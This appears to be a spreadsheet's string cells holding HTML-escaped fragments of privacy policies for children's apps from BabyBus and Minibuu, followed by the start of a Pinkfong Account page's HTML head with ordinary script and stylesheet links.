    <t>If your personal information is inaccurate or incomplete, you have the right to obtain rectification of your inaccurate personal information without undue delay and you can modify the information you provided via email.&lt;/p&gt;
										&lt;/li&gt;
										&lt;li&gt;
											&lt;span&gt;(3) Right to Delete&lt;/span&gt;
											&lt;p&gt;You have the right to delete your personal information by contacting us at privacy@babybus.com.
												 You acknowledge and agree that as a result of deleting your BabyBus account, you will lose access to our services, including the BabyBus account, subscriptions and App-related information linked to such account and lose the possibility to access other services through the BabyBus account.&lt;/p&gt;
										&lt;/li&gt;
										&lt;li&gt;
											&lt;span&gt;(4)</t>
  </si>
  <si>
    <t>Other Rights&lt;/span&gt;
											&lt;p&gt;You may request any other rights as provided herein or regulated in the applicable laws from authorities (including but not limited to the GDPR and the CCPA) by sending an email at  privacy@babybus.com. Upon receiving your request via email, we will promptly conduct a verification process including but not limited to instructing you to provide information to confirm that you are the user from whom we have collected information from. &lt;/p&gt;
										&lt;/li&gt;
									&lt;/ul&gt;
								&lt;/li&gt;
								&lt;li&gt;&lt;strong&gt;6.2.</t>
  </si>
  <si>
    <t>Your rights as an EEA resident&lt;/strong&gt;
									&lt;ul&gt;
										&lt;li&gt;GDPR grants EEA residents certain privacy rights regarding the personal information we collect. You have the following rights in addition to your rights to know, correct, update, or request the deletion of your personal information.&lt;/li&gt;
										&lt;li&gt;
											&lt;span&gt;(1) Right to Object&lt;/span&gt;
											&lt;p&gt;When our processing of your personal information is based on legitimate interests according to Article 6(1)(f) of the GDPR, you have the right to object to our processing.</t>
  </si>
  <si>
    <t>If you object, we will no longer process your personal information unless there are compelling and prevailing legitimate grounds for processing as described in Article 21 of the GDPR; in particular, if the information is necessary for the establishment, exercise or defense of legal claims. You also have the right to complain to a supervisory authority.&lt;/p&gt;
										&lt;/li&gt;
										&lt;li&gt;
											&lt;span&gt;(2) Right to Restrict Processing&lt;/span&gt;
											&lt;p&gt;You have the right to restrict the processing of your personal information under the conditions set out in Article 18 of the GDPR.&lt;/p&gt;
										&lt;/li&gt;
										&lt;li&gt;
											&lt;span&gt;(3)</t>
  </si>
  <si>
    <t>Right to Personal Information Portability&lt;/span&gt;
											&lt;p&gt;You have the right to receive your personal information in a structured, commonly used and machine-readable format and have the right to transmit those information to another controller under the conditions set out in Article 20 of the GDPR.&lt;/p&gt;
										 &lt;/li&gt;
									&lt;/ul&gt;
								&lt;/li&gt;
								&lt;li&gt;&lt;strong&gt;6.3. Your rights as a California resident&lt;/strong&gt;
									&lt;ul&gt;
										&lt;li&gt;The California Consumer Privacy Act (“CCPA”) grants California residents certain privacy rights regarding the personal information we collect.</t>
  </si>
  <si>
    <t xml:space="preserve">You have the following rights in addition to your rights to know, correct, update, or request the deletion of your personal information.&lt;/li&gt;
										&lt;li&gt;
											&lt;span&gt;(1) Right to Know About Personal Information Collected, Disclosed, or Sold
											You have the right to access your personal information that we hold about you, i.e. the right to require free of charge, &lt;/span&gt;
											 &lt;ul&gt;
												&lt;li&gt;(i) information regarding whether your personal information is collected, used, disclosed, or sold, &lt;/li&gt;
												&lt;li&gt;(ii) categories of your personal information that has been collected in the preceding 12 months, &lt;/li&gt;
												&lt;li&gt;(iii) categories of sources from which your personal information is collected,  &lt;/li&gt;
												&lt;li&gt;(iv) business or commercial collecting or selling your personal information (if any), &lt;/li&gt;
												&lt;li&gt;(v) disclosure of sale of your personal information (if any): i.e. the categories of your personal information which has been disclosed or sold (if any) to third parties in the preceding 12 months, the categories of third parties to whom your personal information was disclosed or sold (if any), statement regarding whether we have actual knowledge that we sell your personal information if you are under 16 years of age; and you have the right to request us to provide a duplicate of your personal information undergoing processing, subject to submitting a verifiable request in the form of email to privacy@babybus.com.&lt;/li&gt;
											&lt;/ul&gt;
										</t>
  </si>
  <si>
    <t>&lt;/li&gt;
										&lt;li&gt;(2) Right to Opt-Out of the Sale of Personal Information (if any)
											&lt;p&gt;You have the right to opt-out of the sale of your personal information (if any) and request us to make a statement regarding whether or not we have sold your personal information and provide an opt-out mechanism or link to it except as otherwise stipulated in the CCPA.&lt;/p&gt;
										 &lt;/li&gt;
										&lt;li&gt;(3)</t>
  </si>
  <si>
    <t>Right to Non-Discrimination for the Exercise of a Consumer’s Privacy Rights
											&lt;p&gt;You have the right not to receive discriminatory treatment by us for the privacy rights conferred by the CCPA, namely that we shall not offer a financial incentive or a price or service difference due to your exercise of any of your rights under the CCPA unless such difference is reasonably related to the value of your personal information. Notwithstanding the foregoing, we have the right to deny your request to know, request to delete, or request to opt-out for reasons permitted by the CCPA or those regulations thereof, and such denial shall not be considered discriminatory.&lt;/p&gt;
										&lt;/li&gt;
										&lt;li&gt;(4) Right to Authorize an Agent to Make a Request on Your Behalf
											&lt;p&gt;You have the right to authorize an agent on your behalf to make a request to know, delete, or opt-out under the CCPA.</t>
  </si>
  <si>
    <t>When you use an authorized agent to submit any request provided above, we may require you to provide signed permission to authorize your agent to do so for the purpose of verifying your own identity, and the official permission by your agent to submit this request. In the case of failure to provide any of the requested materials, in order to protect the user’s information and information security, we are entitled to denying such request.&lt;/p&gt;
										&lt;/li&gt;
									&lt;/ul&gt;
								&lt;/li&gt;
								&lt;li&gt;&lt;strong&gt;6.4. EU&amp;UK</t>
  </si>
  <si>
    <t>representative&lt;/strong&gt;
									&lt;ul&gt;
										&lt;li&gt;For EU or UK data subjects, you have the right to make inquiries to us or complaints to the supervisory authority (“SA”) regarding our data processing activities. For questions, or to exercise your rights as an EU or UK data subject, please contact our EU or UK representative.&lt;/li&gt;
										&lt;li&gt;
											&lt;span&gt;(1) UK representative&lt;/span&gt;
											&lt;p&gt;Rickert Services Ltd UK&lt;/p&gt;
											&lt;p&gt;-BabyBus Co., Ltd. -&lt;/p&gt;
											&lt;p&gt;PO Box 1487&lt;/p&gt;
											&lt;p&gt;Peterborough&lt;/p&gt;
											&lt;p&gt;PE1 9XX&lt;/p&gt;
											&lt;p&gt;United Kingdom&lt;/p&gt;
											&lt;p&gt;art-27-rep-babybus@rickert-services.uk&lt;/p&gt;
										&lt;/li&gt;
										&lt;li&gt;
											&lt;span&gt;(2) EU representative&lt;/span&gt;
											&lt;p&gt;</t>
  </si>
  <si>
    <t>Rickert Rechtsanwaltsgesellschaft mbH&lt;/p&gt;
											&lt;p&gt;- [BabyBus Co., Ltd.] -&lt;/p&gt;
											&lt;p&gt;Colmantstraße 15&lt;/p&gt;
											&lt;p&gt;53115 Bonn&lt;/p&gt;
											&lt;p&gt;Germany&lt;/p&gt;
											&lt;p&gt;art-27-rep-babybus@rickert.law&lt;/p&gt;
										&lt;/li&gt;
									&lt;/ul&gt;
								&lt;/li&gt;
								&lt;li&gt;&lt;strong&gt;6.5.</t>
  </si>
  <si>
    <t>Japan&lt;/strong&gt;
									&lt;ul&gt;
										&lt;li&gt;When you reside in Japan, the Act on Protection of Personal Information(“APPI”) of Japan applies to the collection and processing of your personal data by us.&lt;/li&gt;
										&lt;li&gt;As specified in this Privacy Policy, our servers and main business operations are located globally. By using our Service and providing us with information, you acknowledge and understand the transferring, storing and processing of your information on servers in the manner described in this Privacy Policy. &lt;/li&gt;
										&lt;li&gt;If you have any questions about this Policy, you may contact us at privacy@babybus.com</t>
  </si>
  <si>
    <t>.&lt;/li&gt;
									&lt;/ul&gt;
								&lt;/li&gt;
							&lt;/ul&gt;
						&lt;/p&gt;
						&lt;p class="detail section-header"&gt;&lt;strong&gt;7. International transfer&lt;/strong&gt;&lt;/p&gt;
						&lt;p class="detail"&gt;
							&lt;span&gt; We store information on the server closest to the end user's location to provide a secure and fast service The locations of servers for the game services include:&lt;/span&gt;
							&lt;ul&gt;
								&lt;li&gt;(1) the United States, in which the CCPA and the COPPA shall govern our services conducted as stipulated in this Privacy Policy;&lt;/li&gt;
								&lt;li&gt;(2) Hong Kong; and&lt;/li&gt;
								&lt;li&gt;(3) Germany(where EEA users' data is stored), in which the GDPR shall govern our services conducted as stipulated in this Privacy Policy.&lt;/li&gt;
								&lt;li&gt;You acknowledge and agree that your data is processed on our servers or our processors’ servers which may not locate in your country of residence.</t>
  </si>
  <si>
    <t>We use European Commission-approved contract clauses or other appropriate safeguards that are defined in Art. 46 GDPR to protect your personal information. &lt;/li&gt;
								&lt;li&gt;However, we will only keep your data for as long as your account is active or is only necessary to provide your services unless they are deleted in accordance with your request or in accordance with legal requirements and matter where the servers are located.</t>
  </si>
  <si>
    <t>We will make great efforts to take appropriate measures to guarantee your rights in conformity with this Privacy Policy.&lt;/li&gt;
							&lt;/ul&gt;
						&lt;/p&gt;
						&lt;p class="detail section-header"&gt;&lt;strong&gt;8. How long do we keep information about you?&lt;/strong&gt;&lt;/p&gt;
						&lt;p class="detail"&gt;
							&lt;span&gt; We will only store your information as long as necessary to fulfill the purposes for which the information is collected and processed.</t>
  </si>
  <si>
    <t>Upon the expiration of such period, your personal data will be deleted or anonymized, as requested by applicable law.&lt;/span&gt;
						&lt;/p&gt;
						&lt;p class="detail section-header"&gt;&lt;strong&gt;9. Contact us with your questions&lt;/strong&gt;&lt;/p&gt;
						&lt;p class="detail"&gt;
							&lt;span&gt;If you have any questions about this Privacy Policy or have any requests for resolving issues regarding your personal information while using our services, please contact us as soon as possible by emailing us at privacy@babybus.com.&lt;/span&gt;
						&lt;/p&gt;
						&lt;p class="detail section-header"&gt;&lt;strong&gt;10. Will there be changes to this policy?&lt;/strong&gt;&lt;/p&gt;
						&lt;p class="detail"&gt;
							&lt;span&gt;</t>
  </si>
  <si>
    <t>We may occasionally update this Privacy Policy. When we do, we will indicate the date that this Privacy Policy was last updated. Any changes we make will be effective immediately upon notice.</t>
  </si>
  <si>
    <t>The updated version will be effective as soon as it is accessible. If we make material changes to this privacy notice, we may notify you either by prominently posting a notice of such changes or by directly sending you a notification. We encourage you to review this privacy notice frequently to be informed of how we protect your information.&lt;/span&gt;
						&lt;/p&gt;
					&lt;/article&gt;
					&lt;!--</t>
  </si>
  <si>
    <t>&lt;p&gt;JAPAN BABYBUS CO., LTD., having its registered address at 702, 2-1-11 Nihonbashi Kayabacho Chuo-ku, Tokyo, Japan, (hereinafter referred to as “BabyBus”, “we”, or “us”) respects the privacy of its users, both parents and children (hereinafter referred to as “you” or “user”). We believe that it is important for you to make informed decisions regarding the use of our applications(“Apps”). Therefore, we have provided our privacy policy (“Privacy Policy”)which describes our privacy practices while you use our Apps.</t>
  </si>
  <si>
    <t>Please read it carefully as it will help you understand what we do with the information that we collect.&lt;/p&gt;
					&lt;p style="color: #ff0000;"&gt;If you are a minor child or under the legal age to consent, please read the following privacy with your parent. Also, you must obtain parental consent before playing our Apps. &lt;/p&gt;
					&lt;p&gt;</t>
  </si>
  <si>
    <t>BabyBus is committed to protecting the privacy of children who use our Apps. This privacy policy explains our information collection, disclosure, and parental consent practices concerning the information provided by children. Accordingly, this Privacy Policy aims to comply with requirements of the U.S. Children's Online Privacy Protection Act ("COPPA"), the General information Protection Regulation and(“GDPR”) and any other applicable laws.</t>
  </si>
  <si>
    <t>We reserve the right to amend this Privacy Policy.&lt;/p&gt;
					&lt;p&gt; We may translate this Policy into other languages. If there is any difference between the English version and any other language version of this Agreement, then (subject to applicable laws and regulations)</t>
  </si>
  <si>
    <t>the English version will prevail to the extent of the inconsistency.&lt;/p&gt;
					&lt;ul&gt;
						&lt;li&gt;1.What information do we collect from you and how we use it?
							&lt;p&gt; In short, we collect information directly or passively. We won’t require a child to disclose more information than is reasonably necessary.&lt;/p&gt;
							&lt;p&gt;(a)Information we collect directly from you&lt;/p&gt;
							&lt;p&gt;Currently, we do not collect any information directly from you, such as biological iCurrently, we do not collect any information directly from you, such as biological information, location information, contact information, etc.</t>
  </si>
  <si>
    <t>If we change the type of information collected, we will mention it in our privacy policy and send a notification to users.&lt;/p&gt;
							&lt;p&gt;(b)Information we collect passively:&lt;/p&gt;
							&lt;p&gt; We also collect certain technical non-personal information (which might be considered as personal information under some legislations), such as (1)IP Address; (2)Log and usage data, such as game progress, game time, achievements, and error and crash reports. We use this information to: &lt;/p&gt;
							&lt;p&gt;(i)allow you to connect to the server; (ii)operate, provide, maintain, protect, manage, customize our Apps and the way in which we offer them; (iii)enhance the experience with the Apps, detect fraud, security or technical issues in connection with the Apps.&lt;/p&gt;
							&lt;p&gt;(c)Information collected by third parties:&lt;/p&gt;
							&lt;p&gt;Please carefully read Part 2(Advertising) and Part 3(a)(Authorized third parties) of the Privacy Policy.</t>
  </si>
  <si>
    <t>&lt;/p&gt;
						&lt;/li&gt;
						&lt;li&gt;2.Advertising
							&lt;p&gt;(a)In order to allows us to continue offering the Apps for free or at low cost, we may display advertisements to you. To enable advertising tracking, we allow our advertising partners to collect device identifiers (i.e. IDFA on iOS) that might be considered as personal information under some legislations. You can choose whether to allow or disable our Apps from collecting this device identifier when prompted for an authorization notification by your phone system or through the privacy settings in your phone system.&lt;/p&gt;
							&lt;p&gt;(b)Currently, we only contract with Google LLC to provide advertising.</t>
  </si>
  <si>
    <t>By indicating our content as child-directed, we disable any Interested-based ads and remarketing ads on our Apps.
							 &lt;/p&gt;
						&lt;/li&gt;
						&lt;li&gt;3.Do we share any information we collect?
							 &lt;p&gt;</t>
  </si>
  <si>
    <t>We do not sell any of your personal information with or to any independent third parties.
							 &lt;/p&gt;
							&lt;p&gt;Situations where we will disclose or allow a</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
    &lt;meta name="description" content="In Minibuu we are working to make
educational &amp; fun games for kids. "&gt;
    &lt;title&gt;Minibuu&lt;/title&gt;
    &lt;!-- Bootstrap --&gt;
    &lt;link href="/assets/themes/custom-assets/css/bootstrap.min.css" rel="stylesheet"&gt;
    &lt;link href="/assets/themes/custom-assets/css/custom.css" rel="stylesheet"&gt;
    &lt;link href="/assets/plugins/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"/&gt;
    &lt;link href="/assets/plugins/animate.css" rel="stylesheet" type="text/css"/&gt;
    &lt;link href="/assets/plugins/owl-carousel/owl.carousel.min.css" rel="stylesheet" type="text/css"/&gt;
    &lt;link rel="icon" type="image/png" href="/favico.png"/&gt;
  &lt;/head&gt;
  &lt;body&gt;
&lt;nav class="navbar navbar-default navbar-fixed-top"&gt;
      &lt;div class="container navbar-container"&gt;
        &lt;div class="navbar-header"&gt;
          &lt;button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"&gt;
            &lt;span class="sr-only"&gt;Toggle navigation&lt;/span&gt;
            &lt;span class="icon-bar"&gt;&lt;/span&gt;
            &lt;span class="icon-bar"&gt;&lt;/span&gt;
            &lt;span class="icon-bar"&gt;&lt;/span&gt;
          &lt;/button&gt;
          &lt;a class="navbar-brand" href="/"&gt;&lt;img class="navbar-logo" src="/assets/themes/custom-assets/imgs/logo.png"&gt;&lt;/a&gt;
        &lt;/div&gt;
        &lt;div id="navbar" class="navbar-collapse collapse"&gt;
          &lt;ul class="nav navbar-nav navbar-right"&gt;
             &lt;li&gt;&lt;a href="/#apps" &gt;Apps&lt;/a&gt;&lt;/li&gt;
             &lt;li&gt;&lt;a href="/#videos" &gt;Videos&lt;/a&gt;&lt;/li&gt;
             &lt;li&gt;&lt;a href="/#the-team" &gt;</t>
  </si>
  <si>
    <t xml:space="preserve">The team&lt;/a&gt;&lt;/li&gt;
             &lt;li&gt;&lt;a href="/about"&gt;About us&lt;/a&gt;&lt;/li&gt;
             &lt;li&gt;&lt;a href="/#contact"&gt;Contact&lt;/a&gt;&lt;/li&gt;
          &lt;/ul&gt;
        &lt;/div&gt;&lt;!--/.nav-collapse --&gt;
      &lt;/div&gt;
&lt;/nav&gt;
&lt;div class="top-space"&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="container politics-section"&gt;
&lt;h1 class="text-center section-title"&gt;Privacy Policy&lt;/h1&gt;
&lt;p&gt;&lt;b&gt;Last Revised: 25 May 2020&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;
Minibuu ("Minibuu", "we") are committed to protecting your Personal Data. We offer services and games that can collect information from you and your children, so we have prepared a document called the Privacy Policy. In this Privacy Policy, we will explain what we do with the Personal Data that you provide to us or which we can collect from you in the provision of services to you.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;p&gt;
 This Privacy Policy is in compliance with the US Children's Online Privacy Protection Act (COPPA) and the European General Data Protection Regulation (GDPR).
 &lt;/p&gt;
&lt;br&gt;
&lt;p&gt;
&lt;b&gt;1.</t>
  </si>
  <si>
    <t>WHO WE ARE?&lt;/b&gt;
 &lt;br&gt;
Minibuu is a company with registered office in Tijuana, Mexico.
 We are the Personal Data controllers responsible for your Personal Data.</t>
  </si>
  <si>
    <t xml:space="preserve">A Personal Data controller is the person who decides for what purposes Personal Data will be used.
 Our contact details are as follows:
Minibuu
Tijuana, Mexico.
 Phone: +526644471708
Email: info@minibuu.com
</t>
  </si>
  <si>
    <t xml:space="preserve">If you have questions about this Privacy Policy or wish to exercise your rights, contact us by email at info@minibuu.com.
 &lt;/p&gt;
&lt;br&gt;
&lt;p&gt;
&lt;b&gt;2. WHAT IS THE PURPOSE OF THIS PRIVACY POLICY?&lt;/b&gt;&lt;br&gt;
While you visit our website at www.minibuu.com or you play Minibuu games ("Services" or "Games"), we may collect information about you ("Personal Data").
</t>
  </si>
  <si>
    <t xml:space="preserve">We care about your Personal Data protection, so we have developed this Privacy Policy.
 By this Privacy Policy, we want to clearly and comprehensibly explain what data we collect, how we use, disclose and transfer it.
 From time to time, we may change the terms of this Privacy Policy, so do not forget to read this Privacy Policy on a regular basis to understand how we use your Personal Data.
</t>
  </si>
  <si>
    <t>If we make a material change to this policy, we will post a notice on our website prior to making the change. If we have your parent email address, we will contact you to let you know about the changes.
 &lt;/p&gt;
&lt;br&gt;
&lt;p&gt;
&lt;b&gt;3.</t>
  </si>
  <si>
    <t>WHAT PERSONAL DATA WE COLLECT?&lt;/b&gt;&lt;br&gt;
I do not collect any information through or about the usage of my games whatsoever. I used to collect anonymous usage statistics to help me improve my game, but in the light of the European GPDR, I decided I did not wanted to annoy my players with a consent popup, so I removed all forms of analytics from all of my games.</t>
  </si>
  <si>
    <t xml:space="preserve">I also disable and disallow any plugins I use to create my games to collect any anonymous data. &lt;br&gt;&lt;br&gt;
Unity, one of the game engines I use, implements an interface on Android to request a device's Android Device ID and the Advertising ID. I don't use these interfaces in my games whatsoever, and have confirmed with Unity that the data that could be requested from these interfaces isn't used by Unity internally either and never leaves your device.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;br&gt;
&lt;p&gt;
&lt;b&gt;4. OUR THIRD-PARTY DATA CONTROLLERS AND PROCESSORS&lt;/b&gt;
&lt;br&gt;
Google Analytics (Google Inc.)&lt;br&gt;
Google Analytics is a web analysis service provided by Google Inc.</t>
  </si>
  <si>
    <t>Google Analytics uses Personal and Non-Personal Data only for internal purposes.
 Legal basis of processing: legitimate interests (support for internal operations).
 &lt;br&gt;
Place of processing: US&lt;br&gt;
Privacy Policy: https://policies.google.com/privacy?hl=en&lt;br&gt;
Address: 1600 Amphitheatre Pkwy, Mountain View, California 94043, US&lt;br&gt;
Phone: 650-253-0000
&lt;br&gt;&lt;br&gt;
AdMob by Google (Google Inc.)&lt;br&gt;
AdMob is a mobile advertising platform which allows developers to monetize their app(s) by displaying in-app ads from other advertisers.</t>
  </si>
  <si>
    <t xml:space="preserve">AdMob allows to set TFUA (Tag for Users under the Age of Consent in Europe) on ad requests. All ad requests that include TFUA disables ads personalization for users under the age of consent and collection of data by third party partners. Admob uses Personal and Non-Personal Data only for internal purposes.
</t>
  </si>
  <si>
    <t>Legal basis of processing: legitimate interests (support for internal operations).
 Place of processing: US&lt;br&gt;
Privacy Policy: https://policies.google.com/privacy?hl=en&lt;br&gt;
Address: 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA.&lt;br&gt;
Contact: https://support.google.com/policies/&lt;br&gt;troubleshooter/7575787?visit_id=636888632405295138-51672301&amp;hl=en&amp;rd=2&lt;br&gt;
&lt;br&gt;&lt;br&gt;
ironSource Mobile Ltd.&lt;br&gt;
ironSource Mobile Ltd. is a network that connects app developers with advertisers, and helps app developers to serve ads on their apps, a mediation platform that helps app developers to manage all the ad providers with which they have a direct relationship and a marketing platform that helps advertisers to create and optimize advertising campaigns. ironSouce uses Personal and Non-Personal Data only for internal purposes.&lt;br&gt;
Legal basis of processing: legitimate interests (support for internal operations).&lt;br&gt;
Place of processing: US&lt;br&gt;
Privacy Policy: https://developers.ironsrc.com/ironsource-mobile/air/&lt;br&gt;ironsource-mobile-privacy-policy/&lt;br&gt;
Address: 121 Menachem Begin Rd., Tel Aviv, Israel&lt;br&gt;
Contact: dpo@ironsrc.com&lt;br&gt;
&lt;br&gt;&lt;br&gt;
Vungle Limited&lt;br&gt;
Vungle is an ad network providing a technology platform for clients that want to advertise and/or monetize their applications, games, and other products.</t>
  </si>
  <si>
    <t>Vungle uses Personal and Non-Personal Data only for internal purposes.&lt;br&gt;
Legal basis of processing: legitimate interests (support for internal operations).&lt;br&gt;
Place of processing: US&lt;br&gt;
Privacy Policy: https://vungle.com/privacy/#section-1&lt;br&gt;
Address: Clover House, 147-149 Farringdon Road, London, England, EC1R 3AB&lt;br&gt;
Contact: privacy@vungle.com &lt;br&gt;
Unity Technologies ApS.&lt;br&gt;
Unity Ads is an advertising service provided by Unity Technologies ApS. Unity Ads uses Personal and Non-Personal Data only for internal purposes.&lt;br&gt;
Legal basis of processing: legitimate interests (support for internal operations).&lt;br&gt;
Privacy Policy: https://unity3d.com/legal/privacy-policy&lt;br&gt;
Address: Unity Technologies Finland OY, Kaivokatu 8 B, 00100 Helsinki, Finland&lt;br&gt;
Contact: DPO@unity3d.com&lt;br&gt;
&lt;br&gt;
Unity Analytics (Unity Technologies)&lt;br&gt;
Unity Analytics is a data platform that provides analytics.</t>
  </si>
  <si>
    <t>Unity Analytics uses Personal and Non-Personal Data only for internal purposes.&lt;br&gt;
Legal basis of processing: legitimate interests (support for internal operations).&lt;br&gt;
Privacy Policy: https://unity3d.com/legal/privacy-policy&lt;br&gt;
Address: 30 3rd Street, San Francisco, CA 94103, United States&lt;br&gt;
Contact: DPO@unity3d.com&lt;br&gt;
Firebase by Google (Google Inc.)&lt;br&gt;
Firebase is a mobile analytics platform which allows developers to analyse crash reporting and retention. Firebase uses Personal and Non-Personal Data only for internal purposes.&lt;br&gt;
Legal basis of processing: legitimate interests (support for internal operations).&lt;br&gt;
Place of processing: US&lt;br&gt;
Privacy Policy: https://policies.google.com/privacy?hl=en&lt;br&gt;
Address: 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA.&lt;br&gt;
Contact: https://firebase.google.com/support/troubleshooter/contact/&lt;br&gt;
&lt;br&gt;&lt;br&gt;
AppLovin Corporation&lt;br&gt;
AppLovin is an advertising service provided by AppLovin Corporation, a Delaware corporation. AppLovin uses Personal and Non-Personal Data only for internal purposes.&lt;br&gt;
Legal basis of processing: legitimate interests (support for internal operations).&lt;br&gt;
Privacy policy: https://www.applovin.com/terms/&lt;br&gt;
Address: 849 High St., Palo Alto, California, 94301, United States&lt;br&gt;
Contact:</t>
  </si>
  <si>
    <t xml:space="preserve">care@applovin.com &lt;br&gt;
&lt;/p&gt;
&lt;br&gt;
&lt;p&gt;
&lt;b&gt;5. HOW TO CONTACT US?&lt;/b&gt;
You can contact us at any time with any of your Personal Data protection issues at:
Minibuu
Tijuana, Mexico
Phone: +526644471708
Email: info@minibuu.com
</t>
  </si>
  <si>
    <t>We will respond to all your requests within the shortest possible time.
 &lt;/p&gt;
&lt;br&gt;
&lt;b&gt;Got any questions?&lt;/b&gt;  &lt;br&gt;
If you have any questions concerning this Privacy Policy, you are most welcome to send us your question in the &lt;a href="/#contact"&gt;contact section&lt;/a&gt; &lt;/p&gt;
&lt;/div&gt;
	&lt;footer class="footer"&gt;
      &lt;div class="container footer-container"&gt;
      &lt;div class="row"&gt;
      &lt;div class="col-xs-12 col-sm-7"&gt;
        &lt;p class="footer-txt"&gt;&lt;i class="fa fa-envelope" aria-hidden="true"&gt;&lt;/i&gt; info@minibuu.com&lt;/p&gt;
         &lt;p class="footer-txt"&gt;&lt;i class="fa fa-map-marker" aria-hidden="true"&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>Tijuana, BC&lt;/p&gt;
         &lt;p class="footer-txt"&gt;Read our 
          &lt;b&gt;&lt;a href="/privacy-policy"&gt;Minibuu Privacy policy&lt;/a&gt;.&lt;/b&gt;
        &lt;/p&gt;
      &lt;/div&gt;
      &lt;div class="col-xs-12 col-sm-5"&gt;
       &lt;div class="text-center footer-social"&gt;
        &lt;a target="_BLANK" href="https://www.facebook.com/Minibuu-464981050561464/"&gt;&lt;p class="social-icon-f"&gt;&lt;i class="fa fa-facebook" aria-hidden="true"&gt;&lt;/i&gt;&lt;/p&gt;&lt;/a&gt;
        &lt;a target="_BLANK" href="https://www.youtube.com/c/Minibuu"&gt;&lt;p class="social-icon-y"&gt;&lt;i class="fa fa-youtube" aria-hidden="true"&gt;&lt;/i&gt;&lt;/p&gt;&lt;/a&gt;
        &lt;a target="_BLANK" href="https://www.instagram.com/minibuuofficial/"&gt;&lt;p class="social-icon-i"&gt;&lt;i class="fa fa-instagram" aria-hidden="true"&gt;&lt;/i&gt;&lt;/p&gt;&lt;/a&gt;
        &lt;a target="_BLANK" href="https://play.google.com/store/apps/dev?id=7987175214570225485"&gt;&lt;p class="social-icon-a android-icon"&gt;&lt;i class="fa fa-android" aria-hidden="true"&gt;&lt;/i&gt;&lt;/p&gt;&lt;/a&gt;
        &lt;a target="_BLANK" href="https://itunes.apple.com/us/developer/uriel-cebreros/id1153963816?mt=8"&gt;&lt;p class="social-icon-a"&gt;&lt;i class="fa fa-apple" aria-hidden="true"&gt;&lt;/i&gt;&lt;/p&gt;&lt;/a&gt;
        &lt;/div&gt;
      &lt;/div&gt;
      &lt;/div&gt;
      &lt;/div&gt;
    &lt;/footer&gt;
    &lt;!-- jQuery (necessary for Bootstrap's JavaScript plugins) --&gt;
    &lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"&gt;&lt;/script&gt;
    &lt;!-- Include all compiled plugins (below), or include individual files as needed --&gt;
    &lt;script src="/assets/themes/custom-assets/js/bootstrap.min.js"&gt;&lt;/script&gt;
    &lt;script src="/assets/themes/custom-assets/js/main.js"&gt;&lt;/script&gt;
     &lt;script src="/assets/plugins/jquery.animateNumber.js"&gt;&lt;/script&gt;
     &lt;script src="/assets/plugins/owl-carousel/owl.carousel.min.js"&gt;&lt;/script&gt;
     &lt;script src="/assets/themes/custom-assets/js/carousel.js"&gt;&lt;/script&gt;
  &lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;meta charSet="utf-8"/&gt;&lt;title&gt;Pinkfong Account&lt;/title&gt;&lt;meta name="description" content="Pinkfong Account"/&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"/&gt;&lt;meta name="next-head-count" content="4"/&gt;&lt;link rel="preconnect" href="https://fonts.googleapis.com"/&gt;&lt;link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="true"/&gt;&lt;link rel="stylesheet" data-href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@100;300;400;500;700&amp;amp;family=Noto+Sans+JP:wght@100;300;400;500;700&amp;amp;family=Noto+Sans+KR:wght@100;300;400;500;700&amp;amp;display=swap"/&gt;&lt;link rel="favicon" href="/favicon.ico"/&gt;&lt;link rel="preload" href="https://assets-pid-cdn.pinkfong.com/_next/static/css/0b644faa639517fa.css" as="style"/&gt;&lt;link rel="stylesheet" href="https://assets-pid-cdn.pinkfong.com/_next/static/css/0b644faa639517fa.css" data-n-g=""/&gt;&lt;link rel="preload" href="https://assets-pid-cdn.pinkfong.com/_next/static/css/8595ff6b2af50224.css" as="style"/&gt;&lt;link rel="stylesheet" href="https://assets-pid-cdn.pinkfong.com/_next/static/css/8595ff6b2af50224.css" data-n-p=""/&gt;&lt;noscript data-n-css=""&gt;&lt;/noscript&gt;&lt;script defer="" nomodule="" src="https://assets-pid-cdn.pinkfong.com/_next/static/chunks/polyfills-5cd94c89d3acac5f.js"&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/chunks/webpack-76afcab87c82a4ce.js" defer=""&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/chunks/framework-4c3194704528425d.js" defer=""&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/chunks/main-0df298080869154c.js" defer=""&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/chunks/pages/_app-0d7c7db49bcec691.js" defer=""&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/chunks/1bfc9850-1dc808642f11057c.js" defer=""&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/chunks/959-3a7775b272e261bd.js" defer=""&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/chunks/9063-4c85721dcddaa7eb.js" defer=""&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/chunks/8402-dcf70978596ddea3.js" defer=""&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/chunks/2434-4d630c043c1ded83.js" defer=""&gt;&lt;/script&gt;&lt;script 